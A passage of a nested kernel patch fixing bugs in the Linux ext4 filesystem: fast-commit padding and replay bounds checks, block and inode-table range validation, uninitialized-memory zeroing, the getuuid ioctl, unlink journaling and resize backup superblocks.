+ static void *ext4_fc_memzero(struct super_block *sb, void *dst, int len,
+ 				u32 *crc)
+@@ -691,62 +709,59 @@ static void *ext4_fc_memzero(struct super_block *sb, void *dst, int len,
+  */
+ static u8 *ext4_fc_reserve_space(struct super_block *sb, int len, u32 *crc)
+ {
+-	struct ext4_fc_tl *tl;
++	struct ext4_fc_tl tl;
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct buffer_head *bh;
+ 	int bsize = sbi->s_journal->j_blocksize;
+ 	int ret, off = sbi->s_fc_bytes % bsize;
+-	int pad_len;
++	int remaining;
++	u8 *dst;
+ 
+ 	/*
+-	 * After allocating len, we should have space at least for a 0 byte
+-	 * padding.
++	 * If 'len' is too long to fit in any block alongside a PAD tlv, then we
++	 * cannot fulfill the request.
+ 	 */
+-	if (len + EXT4_FC_TAG_BASE_LEN > bsize)
++	if (len > bsize - EXT4_FC_TAG_BASE_LEN)
+ 		return NULL;
+ 
+-	if (bsize - off - 1 > len + EXT4_FC_TAG_BASE_LEN) {
+-		/*
+-		 * Only allocate from current buffer if we have enough space for
+-		 * this request AND we have space to add a zero byte padding.
+-		 */
+-		if (!sbi->s_fc_bh) {
+-			ret = jbd2_fc_get_buf(EXT4_SB(sb)->s_journal, &bh);
+-			if (ret)
+-				return NULL;
+-			sbi->s_fc_bh = bh;
+-		}
++	if (!sbi->s_fc_bh) {
++		ret = jbd2_fc_get_buf(EXT4_SB(sb)->s_journal, &bh);
++		if (ret)
++			return NULL;
++		sbi->s_fc_bh = bh;
++	}
++	dst = sbi->s_fc_bh->b_data + off;
++
++	/*
++	 * Allocate the bytes in the current block if we can do so while still
++	 * leaving enough space for a PAD tlv.
++	 */
++	remaining = bsize - EXT4_FC_TAG_BASE_LEN - off;
++	if (len <= remaining) {
+ 		sbi->s_fc_bytes += len;
+-		return sbi->s_fc_bh->b_data + off;
++		return dst;
+ 	}
+-	/* Need to add PAD tag */
+-	tl = (struct ext4_fc_tl *)(sbi->s_fc_bh->b_data + off);
+-	tl->fc_tag = cpu_to_le16(EXT4_FC_TAG_PAD);
+-	pad_len = bsize - off - 1 - EXT4_FC_TAG_BASE_LEN;
+-	tl->fc_len = cpu_to_le16(pad_len);
+-	if (crc)
+-		*crc = ext4_chksum(sbi, *crc, tl, EXT4_FC_TAG_BASE_LEN);
+-	if (pad_len > 0)
+-		ext4_fc_memzero(sb, tl + 1, pad_len, crc);
++
++	/*
++	 * Else, terminate the current block with a PAD tlv, then allocate a new
++	 * block and allocate the bytes at the start of that new block.
++	 */
++
++	tl.fc_tag = cpu_to_le16(EXT4_FC_TAG_PAD);
++	tl.fc_len = cpu_to_le16(remaining);
++	ext4_fc_memcpy(sb, dst, &tl, EXT4_FC_TAG_BASE_LEN, crc);
++	ext4_fc_memzero(sb, dst + EXT4_FC_TAG_BASE_LEN, remaining, crc);
++
+ 	ext4_fc_submit_bh(sb, false);
+ 
+ 	ret = jbd2_fc_get_buf(EXT4_SB(sb)->s_journal, &bh);
+ 	if (ret)
+ 		return NULL;
+ 	sbi->s_fc_bh = bh;
+-	sbi->s_fc_bytes = (sbi->s_fc_bytes / bsize + 1) * bsize + len;
++	sbi->s_fc_bytes += bsize - off + len;
+ 	return sbi->s_fc_bh->b_data;
+ }
+ 
+-/* memcpy to fc reserved space and update CRC */
+-static void *ext4_fc_memcpy(struct super_block *sb, void *dst, const void *src,
+-				int len, u32 *crc)
+-{
+-	if (crc)
+-		*crc = ext4_chksum(EXT4_SB(sb), *crc, src, len);
+-	return memcpy(dst, src, len);
+-}
+-
+ /*
+  * Complete a fast commit by writing tail tag.
+  *
+@@ -774,7 +789,7 @@ static int ext4_fc_write_tail(struct super_block *sb, u32 crc)
+ 	off = sbi->s_fc_bytes % bsize;
+ 
+ 	tl.fc_tag = cpu_to_le16(EXT4_FC_TAG_TAIL);
+-	tl.fc_len = cpu_to_le16(bsize - off - 1 + sizeof(struct ext4_fc_tail));
++	tl.fc_len = cpu_to_le16(bsize - off + sizeof(struct ext4_fc_tail));
+ 	sbi->s_fc_bytes = round_up(sbi->s_fc_bytes, bsize);
+ 
+ 	ext4_fc_memcpy(sb, dst, &tl, EXT4_FC_TAG_BASE_LEN, &crc);
+@@ -784,6 +799,8 @@ static int ext4_fc_write_tail(struct super_block *sb, u32 crc)
+ 	dst += sizeof(tail.fc_tid);
+ 	tail.fc_crc = cpu_to_le32(crc);
+ 	ext4_fc_memcpy(sb, dst, &tail.fc_crc, sizeof(tail.fc_crc), NULL);
++	dst += sizeof(tail.fc_crc);
++	memset(dst, 0, bsize - off); /* Don't leak uninitialized memory. */
+ 
+ 	ext4_fc_submit_bh(sb, true);
+ 
+@@ -1388,7 +1405,7 @@ static int ext4_fc_replay_unlink(struct super_block *sb, struct ext4_fc_tl *tl,
+ 		return 0;
+ 	}
+ 
+-	ret = __ext4_unlink(NULL, old_parent, &entry, inode);
++	ret = __ext4_unlink(old_parent, &entry, inode, NULL);
+ 	/* -ENOENT ok coz it might not exist anymore. */
+ 	if (ret == -ENOENT)
+ 		ret = 0;
+@@ -1977,32 +1994,31 @@ void ext4_fc_replay_cleanup(struct super_block *sb)
+ 	kfree(sbi->s_fc_replay_state.fc_modified_inodes);
+ }
+ 
+-static inline bool ext4_fc_tag_len_isvalid(struct ext4_fc_tl *tl,
+-					   u8 *val, u8 *end)
++static bool ext4_fc_value_len_isvalid(struct ext4_sb_info *sbi,
++				      int tag, int len)
+ {
+-	if (val + tl->fc_len > end)
+-		return false;
+-
+-	/* Here only check ADD_RANGE/TAIL/HEAD which will read data when do
+-	 * journal rescan before do CRC check. Other tags length check will
+-	 * rely on CRC check.
+-	 */
+-	switch (tl->fc_tag) {
++	switch (tag) {
+ 	case EXT4_FC_TAG_ADD_RANGE:
+-		return (sizeof(struct ext4_fc_add_range) == tl->fc_len);
+-	case EXT4_FC_TAG_TAIL:
+-		return (sizeof(struct ext4_fc_tail) <= tl->fc_len);
+-	case EXT4_FC_TAG_HEAD:
+-		return (sizeof(struct ext4_fc_head) == tl->fc_len);
++		return len == sizeof(struct ext4_fc_add_range);
+ 	case EXT4_FC_TAG_DEL_RANGE:
++		return len == sizeof(struct ext4_fc_del_range);
++	case EXT4_FC_TAG_CREAT:
+ 	case EXT4_FC_TAG_LINK:
+ 	case EXT4_FC_TAG_UNLINK:
+-	case EXT4_FC_TAG_CREAT:
++		len -= sizeof(struct ext4_fc_dentry_info);
++		return len >= 1 && len <= EXT4_NAME_LEN;
+ 	case EXT4_FC_TAG_INODE:
++		len -= sizeof(struct ext4_fc_inode);
++		return len >= EXT4_GOOD_OLD_INODE_SIZE &&
++			len <= sbi->s_inode_size;
+ 	case EXT4_FC_TAG_PAD:
+-	default:
+-		return true;
++		return true; /* padding can have any length */
++	case EXT4_FC_TAG_TAIL:
++		return len >= sizeof(struct ext4_fc_tail);
++	case EXT4_FC_TAG_HEAD:
++		return len == sizeof(struct ext4_fc_head);
+ 	}
++	return false;
+ }
+ 
+ /*
+@@ -2040,7 +2056,7 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	state = &sbi->s_fc_replay_state;
+ 
+ 	start = (u8 *)bh->b_data;
+-	end = (__u8 *)bh->b_data + journal->j_blocksize - 1;
++	end = start + journal->j_blocksize;
+ 
+ 	if (state->fc_replay_expected_off == 0) {
+ 		state->fc_cur_tag = 0;
+@@ -2061,11 +2077,12 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	}
+ 
+ 	state->fc_replay_expected_off++;
+-	for (cur = start; cur < end - EXT4_FC_TAG_BASE_LEN;
++	for (cur = start; cur <= end - EXT4_FC_TAG_BASE_LEN;
+ 	     cur = cur + EXT4_FC_TAG_BASE_LEN + tl.fc_len) {
+ 		ext4_fc_get_tl(&tl, cur);
+ 		val = cur + EXT4_FC_TAG_BASE_LEN;
+-		if (!ext4_fc_tag_len_isvalid(&tl, val, end)) {
++		if (tl.fc_len > end - val ||
++		    !ext4_fc_value_len_isvalid(sbi, tl.fc_tag, tl.fc_len)) {
+ 			ret = state->fc_replay_num_tags ?
+ 				JBD2_FC_REPLAY_STOP : -ECANCELED;
+ 			goto out_err;
+@@ -2178,9 +2195,9 @@ static int ext4_fc_replay(journal_t *journal, struct buffer_head *bh,
+ #endif
+ 
+ 	start = (u8 *)bh->b_data;
+-	end = (__u8 *)bh->b_data + journal->j_blocksize - 1;
++	end = start + journal->j_blocksize;
+ 
+-	for (cur = start; cur < end - EXT4_FC_TAG_BASE_LEN;
++	for (cur = start; cur <= end - EXT4_FC_TAG_BASE_LEN;
+ 	     cur = cur + EXT4_FC_TAG_BASE_LEN + tl.fc_len) {
+ 		ext4_fc_get_tl(&tl, cur);
+ 		val = cur + EXT4_FC_TAG_BASE_LEN;
+@@ -2249,17 +2266,17 @@ void ext4_fc_init(struct super_block *sb, journal_t *journal)
+ 	journal->j_fc_cleanup_callback = ext4_fc_cleanup;
+ }
+ 
+-static const char *fc_ineligible_reasons[] = {
+-	"Extended attributes changed",
+-	"Cross rename",
+-	"Journal flag changed",
+-	"Insufficient memory",
+-	"Swap boot",
+-	"Resize",
+-	"Dir renamed",
+-	"Falloc range op",
+-	"Data journalling",
+-	"FC Commit Failed"
++static const char * const fc_ineligible_reasons[] = {
++	[EXT4_FC_REASON_XATTR] = "Extended attributes changed",
++	[EXT4_FC_REASON_CROSS_RENAME] = "Cross rename",
++	[EXT4_FC_REASON_JOURNAL_FLAG_CHANGE] = "Journal flag changed",
++	[EXT4_FC_REASON_NOMEM] = "Insufficient memory",
++	[EXT4_FC_REASON_SWAP_BOOT] = "Swap boot",
++	[EXT4_FC_REASON_RESIZE] = "Resize",
++	[EXT4_FC_REASON_RENAME_DIR] = "Dir renamed",
++	[EXT4_FC_REASON_FALLOC_RANGE] = "Falloc range op",
++	[EXT4_FC_REASON_INODE_JOURNAL_DATA] = "Data journalling",
++	[EXT4_FC_REASON_ENCRYPTED_FILENAME] = "Encrypted filename",
+ };
+ 
+ int ext4_fc_info_show(struct seq_file *seq, void *v)
+diff --git a/fs/ext4/fast_commit.h b/fs/ext4/fast_commit.h
+index a6154c3ed1357..2fadb2c4780c8 100644
+--- a/fs/ext4/fast_commit.h
++++ b/fs/ext4/fast_commit.h
+@@ -58,7 +58,7 @@ struct ext4_fc_dentry_info {
+ 	__u8 fc_dname[];
+ };
+ 
+-/* Value structure for EXT4_FC_TAG_INODE and EXT4_FC_TAG_INODE_PARTIAL. */
++/* Value structure for EXT4_FC_TAG_INODE. */
+ struct ext4_fc_inode {
+ 	__le32 fc_ino;
+ 	__u8 fc_raw_inode[];
+@@ -96,6 +96,7 @@ enum {
+ 	EXT4_FC_REASON_RENAME_DIR,
+ 	EXT4_FC_REASON_FALLOC_RANGE,
+ 	EXT4_FC_REASON_INODE_JOURNAL_DATA,
++	EXT4_FC_REASON_ENCRYPTED_FILENAME,
+ 	EXT4_FC_REASON_MAX
+ };
+ 
+diff --git a/fs/ext4/indirect.c b/fs/ext4/indirect.c
+index 860fc51190098..c68bebe7ff4b6 100644
+--- a/fs/ext4/indirect.c
++++ b/fs/ext4/indirect.c
+@@ -148,6 +148,7 @@ static Indirect *ext4_get_branch(struct inode *inode, int depth,
+ 	struct super_block *sb = inode->i_sb;
+ 	Indirect *p = chain;
+ 	struct buffer_head *bh;
++	unsigned int key;
+ 	int ret = -EIO;
+ 
+ 	*err = 0;
+@@ -156,7 +157,13 @@ static Indirect *ext4_get_branch(struct inode *inode, int depth,
+ 	if (!p->key)
+ 		goto no_block;
+ 	while (--depth) {
+-		bh = sb_getblk(sb, le32_to_cpu(p->key));
++		key = le32_to_cpu(p->key);
++		if (key > ext4_blocks_count(EXT4_SB(sb)->s_es)) {
++			/* the block was out of range */
++			ret = -EFSCORRUPTED;
++			goto failure;
++		}
++		bh = sb_getblk(sb, key);
+ 		if (unlikely(!bh)) {
+ 			ret = -ENOMEM;
+ 			goto failure;
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 2b5ef1b642499..283afda26d9cb 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -222,13 +222,13 @@ void ext4_evict_inode(struct inode *inode)
+ 
+ 	/*
+ 	 * For inodes with journalled data, transaction commit could have
+-	 * dirtied the inode. Flush worker is ignoring it because of I_FREEING
+-	 * flag but we still need to remove the inode from the writeback lists.
++	 * dirtied the inode. And for inodes with dioread_nolock, unwritten
++	 * extents converting worker could merge extents and also have dirtied
++	 * the inode. Flush worker is ignoring it because of I_FREEING flag but
++	 * we still need to remove the inode from the writeback lists.
+ 	 */
+-	if (!list_empty_careful(&inode->i_io_list)) {
+-		WARN_ON_ONCE(!ext4_should_journal_data(inode));
++	if (!list_empty_careful(&inode->i_io_list))
+ 		inode_io_list_del(inode);
+-	}
+ 
+ 	/*
+ 	 * Protect us against freezing - iput() caller didn't have to have any
+@@ -335,6 +335,12 @@ stop_handle:
+ 	ext4_xattr_inode_array_free(ea_inode_array);
+ 	return;
+ no_delete:
++	/*
++	 * Check out some where else accidentally dirty the evicting inode,
++	 * which may probably cause inode use-after-free issues later.
++	 */
++	WARN_ON_ONCE(!list_empty_careful(&inode->i_io_list));
++
+ 	if (!list_empty(&EXT4_I(inode)->i_fc_list))
+ 		ext4_fc_mark_ineligible(inode->i_sb, EXT4_FC_REASON_NOMEM, NULL);
+ 	ext4_clear_inode(inode);	/* We must guarantee clearing of inode... */
+@@ -1309,7 +1315,8 @@ static int ext4_write_end(struct file *file,
+ 
+ 	trace_ext4_write_end(inode, pos, len, copied);
+ 
+-	if (ext4_has_inline_data(inode))
++	if (ext4_has_inline_data(inode) &&
++	    ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
+ 		return ext4_write_inline_data_end(inode, pos, len, copied, page);
+ 
+ 	copied = block_write_end(file, mapping, pos, len, copied, page, fsdata);
+@@ -4225,7 +4232,8 @@ int ext4_truncate(struct inode *inode)
+ 
+ 	/* If we zero-out tail of the page, we have to create jinode for jbd2 */
+ 	if (inode->i_size & (inode->i_sb->s_blocksize - 1)) {
+-		if (ext4_inode_attach_jinode(inode) < 0)
++		err = ext4_inode_attach_jinode(inode);
++		if (err)
+ 			goto out_trace;
+ 	}
+ 
+@@ -4473,9 +4481,17 @@ static int __ext4_get_inode_loc(struct super_block *sb, unsigned long ino,
+ 	inodes_per_block = EXT4_SB(sb)->s_inodes_per_block;
+ 	inode_offset = ((ino - 1) %
+ 			EXT4_INODES_PER_GROUP(sb));
+-	block = ext4_inode_table(sb, gdp) + (inode_offset / inodes_per_block);
+ 	iloc->offset = (inode_offset % inodes_per_block) * EXT4_INODE_SIZE(sb);
+ 
++	block = ext4_inode_table(sb, gdp);
++	if ((block <= le32_to_cpu(EXT4_SB(sb)->s_es->s_first_data_block)) ||
++	    (block >= ext4_blocks_count(EXT4_SB(sb)->s_es))) {
++		ext4_error(sb, "Invalid inode table block %llu in "
++			   "block_group %u", block, iloc->block_group);
++		return -EFSCORRUPTED;
++	}
++	block += (inode_offset / inodes_per_block);
++
+ 	bh = sb_getblk(sb, block);
+ 	if (unlikely(!bh))
+ 		return -ENOMEM;
+@@ -5044,8 +5060,14 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb))
+ 		ext4_error_inode(inode, function, line, 0,
+ 				 "casefold flag without casefold feature");
+-	brelse(iloc.bh);
++	if (is_bad_inode(inode) && !(flags & EXT4_IGET_BAD)) {
++		ext4_error_inode(inode, function, line, 0,
++				 "bad inode without EXT4_IGET_BAD flag");
++		ret = -EUCLEAN;
++		goto bad_inode;
++	}
+ 
++	brelse(iloc.bh);
+ 	unlock_new_inode(inode);
+ 	return inode;
+ 
+@@ -5853,6 +5875,14 @@ static int __ext4_expand_extra_isize(struct inode *inode,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * We may need to allocate external xattr block so we need quotas
++	 * initialized. Here we can be called with various locks held so we
++	 * cannot affort to initialize quotas ourselves. So just bail.
++	 */
++	if (dquot_initialize_needed(inode))
++		return -EAGAIN;
++
+ 	/* try to expand with EAs present */
+ 	error = ext4_expand_extra_isize_ea(inode, new_extra_isize,
+ 					   raw_inode, handle);
+diff --git a/fs/ext4/ioctl.c b/fs/ext4/ioctl.c
+index 95dfea28bf4e9..8067ccda34e45 100644
+--- a/fs/ext4/ioctl.c
++++ b/fs/ext4/ioctl.c
+@@ -374,7 +374,8 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 	blkcnt_t blocks;
+ 	unsigned short bytes;
+ 
+-	inode_bl = ext4_iget(sb, EXT4_BOOT_LOADER_INO, EXT4_IGET_SPECIAL);
++	inode_bl = ext4_iget(sb, EXT4_BOOT_LOADER_INO,
++			EXT4_IGET_SPECIAL | EXT4_IGET_BAD);
+ 	if (IS_ERR(inode_bl))
+ 		return PTR_ERR(inode_bl);
+ 	ei_bl = EXT4_I(inode_bl);
+@@ -424,7 +425,7 @@ static long swap_inode_boot_loader(struct super_block *sb,
+ 	/* Protect extent tree against block allocations via delalloc */
+ 	ext4_double_down_write_data_sem(inode, inode_bl);
+ 
+-	if (inode_bl->i_nlink == 0) {
++	if (is_bad_inode(inode_bl) || !S_ISREG(inode_bl->i_mode)) {
+ 		/* this inode has never been used as a BOOT_LOADER */
+ 		set_nlink(inode_bl, 1);
+ 		i_uid_write(inode_bl, 0);
+@@ -731,6 +732,10 @@ static int ext4_ioctl_setproject(struct inode *inode, __u32 projid)
+ 	if (ext4_is_quota_file(inode))
+ 		return err;
+ 
++	err = dquot_initialize(inode);
++	if (err)
++		return err;
++
+ 	err = ext4_get_inode_loc(inode, &iloc);
+ 	if (err)
+ 		return err;
+@@ -746,10 +751,6 @@ static int ext4_ioctl_setproject(struct inode *inode, __u32 projid)
+ 		brelse(iloc.bh);
+ 	}
+ 
+-	err = dquot_initialize(inode);
+-	if (err)
+-		return err;
+-
+ 	handle = ext4_journal_start(inode, EXT4_HT_QUOTA,
+ 		EXT4_QUOTA_INIT_BLOCKS(sb) +
+ 		EXT4_QUOTA_DEL_BLOCKS(sb) + 3);
+@@ -1153,19 +1154,22 @@ static int ext4_ioctl_getuuid(struct ext4_sb_info *sbi,
+ 
+ 	if (fsuuid.fsu_len == 0) {
+ 		fsuuid.fsu_len = UUID_SIZE;
+-		if (copy_to_user(ufsuuid, &fsuuid, sizeof(fsuuid.fsu_len)))
++		if (copy_to_user(&ufsuuid->fsu_len, &fsuuid.fsu_len,
++					sizeof(fsuuid.fsu_len)))
+ 			return -EFAULT;
+-		return -EINVAL;
++		return 0;
+ 	}
+ 
+-	if (fsuuid.fsu_len != UUID_SIZE || fsuuid.fsu_flags != 0)
++	if (fsuuid.fsu_len < UUID_SIZE || fsuuid.fsu_flags != 0)
+ 		return -EINVAL;
+ 
+ 	lock_buffer(sbi->s_sbh);
+ 	memcpy(uuid, sbi->s_es->s_uuid, UUID_SIZE);
+ 	unlock_buffer(sbi->s_sbh);
+ 
+-	if (copy_to_user(&ufsuuid->fsu_uuid[0], uuid, UUID_SIZE))
++	fsuuid.fsu_len = UUID_SIZE;
++	if (copy_to_user(ufsuuid, &fsuuid, sizeof(fsuuid)) ||
++	    copy_to_user(&ufsuuid->fsu_uuid[0], uuid, UUID_SIZE))
+ 		return -EFAULT;
+ 	return 0;
+ }
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index c08c0aba18836..1c5518a4bdf91 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3204,14 +3204,20 @@ end_rmdir:
+ 	return retval;
+ }
+ 
+-int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name,
+-		  struct inode *inode)
++int __ext4_unlink(struct inode *dir, const struct qstr *d_name,
++		  struct inode *inode,
++		  struct dentry *dentry /* NULL during fast_commit recovery */)
+ {
+ 	int retval = -ENOENT;
+ 	struct buffer_head *bh;
+ 	struct ext4_dir_entry_2 *de;
++	handle_t *handle;
+ 	int skip_remove_dentry = 0;
+ 
++	/*
++	 * Keep this outside the transaction; it may have to set up the
++	 * directory's encryption key, which isn't GFP_NOFS-safe.
++	 */
+ 	bh = ext4_find_entry(dir, d_name, &de, NULL);
+ 	if (IS_ERR(bh))
+ 		return PTR_ERR(bh);
+@@ -3228,7 +3234,14 @@ int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name
+ 		if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 			skip_remove_dentry = 1;
+ 		else
+-			goto out;
++			goto out_bh;
++	}
++
++	handle = ext4_journal_start(dir, EXT4_HT_DIR,
++				    EXT4_DATA_TRANS_BLOCKS(dir->i_sb));
++	if (IS_ERR(handle)) {
++		retval = PTR_ERR(handle);
++		goto out_bh;
+ 	}
+ 
+ 	if (IS_DIRSYNC(dir))
+@@ -3237,12 +3250,12 @@ int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name
+ 	if (!skip_remove_dentry) {
+ 		retval = ext4_delete_entry(handle, dir, de, bh);
+ 		if (retval)
+-			goto out;
++			goto out_handle;
+ 		dir->i_ctime = dir->i_mtime = current_time(dir);
+ 		ext4_update_dx_flag(dir);
+ 		retval = ext4_mark_inode_dirty(handle, dir);
+ 		if (retval)
+-			goto out;
++			goto out_handle;
+ 	} else {
+ 		retval = 0;
+ 	}
+@@ -3255,15 +3268,17 @@ int __ext4_unlink(handle_t *handle, struct inode *dir, const struct qstr *d_name
+ 		ext4_orphan_add(handle, inode);
+ 	inode->i_ctime = current_time(inode);
+ 	retval = ext4_mark_inode_dirty(handle, inode);
+-
+-out:
++	if (dentry && !retval)
++		ext4_fc_track_unlink(handle, dentry);
++out_handle:
++	ext4_journal_stop(handle);
++out_bh:
+ 	brelse(bh);
+ 	return retval;
+ }
+ 
+ static int ext4_unlink(struct inode *dir, struct dentry *dentry)
+ {
+-	handle_t *handle;
+ 	int retval;
+ 
+ 	if (unlikely(ext4_forced_shutdown(EXT4_SB(dir->i_sb))))
+@@ -3281,16 +3296,7 @@ static int ext4_unlink(struct inode *dir, struct dentry *dentry)
+ 	if (retval)
+ 		goto out_trace;
+ 
+-	handle = ext4_journal_start(dir, EXT4_HT_DIR,
+-				    EXT4_DATA_TRANS_BLOCKS(dir->i_sb));
+-	if (IS_ERR(handle)) {
+-		retval = PTR_ERR(handle);
+-		goto out_trace;
+-	}
+-
+-	retval = __ext4_unlink(handle, dir, &dentry->d_name, d_inode(dentry));
+-	if (!retval)
+-		ext4_fc_track_unlink(handle, dentry);
++	retval = __ext4_unlink(dir, &dentry->d_name, d_inode(dentry), dentry);
+ #if IS_ENABLED(CONFIG_UNICODE)
+ 	/* VFS negative dentries are incompatible with Encoding and
+ 	 * Case-insensitiveness. Eventually we'll want avoid
+@@ -3301,8 +3307,6 @@ static int ext4_unlink(struct inode *dir, struct dentry *dentry)
+ 	if (IS_CASEFOLDED(dir))
+ 		d_invalidate(dentry);
+ #endif
+-	if (handle)
+-		ext4_journal_stop(handle);
+ 
+ out_trace:
+ 	trace_ext4_unlink_exit(dentry, retval);
+@@ -3792,6 +3796,9 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 		return -EXDEV;
+ 
+ 	retval = dquot_initialize(old.dir);
++	if (retval)
++		return retval;
++	retval = dquot_initialize(old.inode);
+ 	if (retval)
+ 		return retval;
+ 	retval = dquot_initialize(new.dir);
+diff --git a/fs/ext4/orphan.c b/fs/ext4/orphan.c
+index 69a9cf9137a61..e5b47dda33175 100644
+--- a/fs/ext4/orphan.c
++++ b/fs/ext4/orphan.c
+@@ -412,7 +412,7 @@ void ext4_orphan_cleanup(struct super_block *sb, struct ext4_super_block *es)
+ 		/* don't clear list on RO mount w/ errors */
+ 		if (es->s_last_orphan && !(s_flags & SB_RDONLY)) {
+ 			ext4_msg(sb, KERN_INFO, "Errors on filesystem, "
+-				  "clearing orphan list.\n");
++				  "clearing orphan list.");
+ 			es->s_last_orphan = 0;
+ 		}
+ 		ext4_debug("Skipping orphan recovery on fs with errors.\n");
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index 46b87ffeb3045..b493233750ab2 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -1110,6 +1110,16 @@ exit_free:
+ 	return err;
+ }
+ 
++static inline void ext4_set_block_group_nr(struct super_block *sb, char *data,
++					   ext4_group_t group)
++{
++	struct ext4_super_block *es = (struct ext4_super_block *) data;
++
++	es->s_block_group_nr = cpu_to_le16(group);
++	if (ext4_has_metadata_csum(sb))
++		es->s_checksum = ext4_superblock_csum(sb, es);
++}
++
+ /*
+  * Update the backup copies of the ext4 metadata.  These don't need to be part
+  * of the main resize transaction, because e2fsck will re-write them if there
+@@ -1158,7 +1168,8 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 	while (group < sbi->s_groups_count) {
+ 		struct buffer_head *bh;
+ 		ext4_fsblk_t backup_block;
+-		struct ext4_super_block *es;
++		int has_super = ext4_bg_has_super(sb, group);
++		ext4_fsblk_t first_block = ext4_group_first_block_no(sb, group);
+ 
+ 		/* Out of journal space, and can't get more - abort - so sad */
+ 		err = ext4_resize_ensure_credits_batch(handle, 1);
+@@ -1168,8 +1179,7 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 		if (meta_bg == 0)
+ 			backup_block = ((ext4_fsblk_t)group) * bpg + blk_off;
+ 		else
+-			backup_block = (ext4_group_first_block_no(sb, group) +
+-					ext4_bg_has_super(sb, group));
++			backup_block = first_block + has_super;
+ 
+ 		bh = sb_getblk(sb, backup_block);
+ 		if (unlikely(!bh)) {
+@@ -1187,10 +1197,8 @@ static void update_backups(struct super_block *sb, sector_t blk_off, char *data,
+ 		memcpy(bh->b_data, data, size);
+ 		if (rest)
+ 			memset(bh->b_data + size, 0, rest);
+-		es = (struct ext4_super_block *) bh->b_data;
+-		es->s_block_group_nr = cpu_to_le16(group);
+-		if (ext4_has_metadata_csum(sb))
+-			es->s_checksum = ext4_superblock_csum(sb, es);
++		if (has_super && (backup_block == first_block))
++			ext4_set_block_group_nr(sb, bh->b_data, group);
+ 		set_buffer_uptodate(bh);
+ 		unlock_buffer(bh);
+ 		err = ext4_handle_dirty_metadata(handle, NULL, bh);
+@@ -1476,8 +1484,6 @@ static void ext4_update_super(struct super_block *sb,
+ 	 * active. */
+ 	ext4_r_blocks_count_set(es, ext4_r_blocks_count(es) +
+ 				reserved_blocks);
+-	ext4_superblock_csum_set(sb);
+-	unlock_buffer(sbi->s_sbh);
+ 
+ 	/* Update the free space counts */
+ 	percpu_counter_add(&sbi->s_freeclusters_counter,
+@@ -1513,6 +1519,8 @@ static void ext4_update_super(struct super_block *sb,
+ 		ext4_calculate_overhead(sb);
+ 	es->s_overhead_clusters = cpu_to_le32(sbi->s_overhead);
+ 
++	ext4_superblock_csum_set(sb);
++	unlock_buffer(sbi->s_sbh);
+ 	if (test_opt(sb, DEBUG))
+ 		printk(KERN_DEBUG "EXT4-fs: added group %u:"
+ 		       "%llu blocks(%llu free %llu reserved)\n", flex_gd->count,
+@@ -1596,8 +1604,8 @@ exit_journal:
+ 		int meta_bg = ext4_has_feature_meta_bg(sb);
+ 		sector_t old_gdb = 0;
+ 
+-		update_backups(sb, sbi->s_sbh->b_blocknr, (char *)es,
+-			       sizeof(struct ext4_super_block), 0);
++		update_backups(sb, ext4_group_first_block_no(sb, 0),
++			       (char *)es, sizeof(struct ext4_super_block), 0);
+ 		for (; gdb_num <= gdb_num_end; gdb_num++) {
+ 			struct buffer_head *gdb_bh;
+ 
+@@ -1808,7 +1816,7 @@ errout:
+ 		if (test_opt(sb, DEBUG))
+ 			printk(KERN_DEBUG "EXT4-fs: extended group to %llu "
+ 			       "blocks\n", ext4_blocks_count(es));
+-		update_backups(sb, EXT4_SB(sb)->s_sbh->b_blocknr,
++		update_backups(sb, ext4_group_first_block_no(sb, 0),
+ 			       (char *)es, sizeof(struct ext4_super_block), 0);
+ 	}
+ 	return err;
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 7cdd2138c8972..aa4f65663fad8 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -1323,6 +1323,7 @@ static struct inode *ext4_alloc_inode(struct super_block *sb)
+ 		return NULL;
+ 
+ 	inode_set_iversion(&ei->vfs_inode, 1);
++	ei->i_flags = 0;
+ 	spin_lock_init(&ei->i_raw_lock);
+ 	INIT_LIST_HEAD(&ei->i_prealloc_list);
+ 	atomic_set(&ei->i_prealloc_active, 0);
+@@ -2247,7 +2248,7 @@ static int ext4_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 			return -EINVAL;
+ 		}
+ 
+-		error = fs_lookup_param(fc, param, 1, &path);
++		error = fs_lookup_param(fc, param, 1, LOOKUP_FOLLOW, &path);
+ 		if (error) {
+ 			ext4_msg(NULL, KERN_ERR, "error: could not find "
+ 				 "journal device path");
+@@ -5287,14 +5288,15 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		goto failed_mount3a;
+ 	} else {
+ 		/* Nojournal mode, all journal mount options are illegal */
+-		if (test_opt2(sb, EXPLICIT_JOURNAL_CHECKSUM)) {
++		if (test_opt(sb, JOURNAL_ASYNC_COMMIT)) {
+ 			ext4_msg(sb, KERN_ERR, "can't mount with "
+-				 "journal_checksum, fs mounted w/o journal");
++				 "journal_async_commit, fs mounted w/o journal");
+ 			goto failed_mount3a;
+ 		}
+-		if (test_opt(sb, JOURNAL_ASYNC_COMMIT)) {
++
++		if (test_opt2(sb, EXPLICIT_JOURNAL_CHECKSUM)) {
